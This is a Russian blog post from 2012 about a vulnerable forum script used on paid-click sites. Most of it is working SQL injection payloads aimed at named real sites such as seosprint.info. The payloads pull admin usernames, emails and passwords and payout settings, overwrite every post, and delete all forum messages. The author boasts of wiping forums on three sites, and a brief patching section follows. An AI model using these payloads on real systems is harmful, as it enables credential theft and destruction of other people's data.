Бомбим форум в SeoEdit

(30.03.2012) Дыры, ошибки

Имеем скрипт. Можно за пример взять этот. Посмотрим, что с ним можно сделать…Итак, имеем форум, установлен он на хост, давайте посмотрим, что с ним можно сделать.

На данный момент здесь стоит кривой форум.

Что можно сделать:

1. SELECT:
1.1. http://seosprint.info/forum_posts.php?th=0\’+union+select+1,2,3,4+—+
1.2. http://seosprint.info/forum_topic.php?gr=\’+union+select+1,2,3,4,5,6,7,8,9,10+—+
1.3. http://seosprint.info/forum_edit.php?post=\’+union+select+(SELECT+username+from+tb_users+where+user_status=\’admin\’),2+—+

Выведенную цифру можно спокойно поменять на запрос, поставив его в скобки.

Примеры запросов:
SELECT+username+from+tb_users+where+user_status=\’admin\’ — берёт логин админа, username можно поменять на email или password. Что к чему вы разберётесь.

SELECT+price+from+tb_config+where+item=\’maxautopay\’ — выведем максимальную сумму для автоматической выплаты.

SELECT+payforad+from+tb_site+where+id=1 — если вывело 1 — значит включена выплата раз в сутки.

SELECT+x2+from+tb_site+where+id=1 — если выводит 1 — значит включены автовыплаты.

Другие запросы можно составить самим.

2. UPDATE:
В этом случае можно сделать массовую замену всех сообщений на форуме на свой текст. Пишем что-нить на форуме -> жмём редактировать -> открываем исходный код и ищем:

<input type="hidden" name="idgroupe" value="123" />


123 — номер вашего поста (ID), меняем в исходном коде его на:

' OR 1=1 — '


Вводим текст и подтверждаем.

3. DELETE
Я так убил форум на clickid.ru, да и на goldenclic.ru и seosprint.info wink

Идём по ссылке: http://seosprint.info/forum_posts.php?delete=\’+or+1=1+—+ (у нас удалились все сообщения на форуме)

Фиксимся:

1. Проставим интвалы forum_posts.php:

$adse=($_GET["th"]);
$pagetemp=($_GET["page"]);


Перед скобками проставляем intval, сделать тоже самое во всех файлах форума.

Далее в forum_posts.php:

$id_dell=strip_tags($_GET["delete"]);


strip_tags => intval

Ещё ниже:

$id_post=strip_tags($_POST["idgroupe"]);


Аналогично меняем strip_tags на intval

Теперь открываем каждый файл и меняем оставшиеся strip_tags на limpiar.

И наконец самый главный фикс: ставим защиту от NGS, чтоб наверняка.

И теперь самый самый важный фикс — удаляем форум и букс заодно и ищем девушку да работаем на нормальной работе wink

Автор публикации

не в сети 14 лет

Alex

Комментарии: 0Публикации: 166Регистрация: 19-02-2011

Понравилась статья? Поделись в соц. сетях:

Похожие новости

Исправление найденных багов к скрипту Nano srt

Исправление авторизации через VK для скрипта Nano SRT

Отправить комментарий

wpDiscuz
Авторизация
Регистрация
*
*
Вход Потеряли пароль ?
Регистрация
*
*
*
Зарегистрироваться
Регистрация
Генерация пароля
Получить новый пароль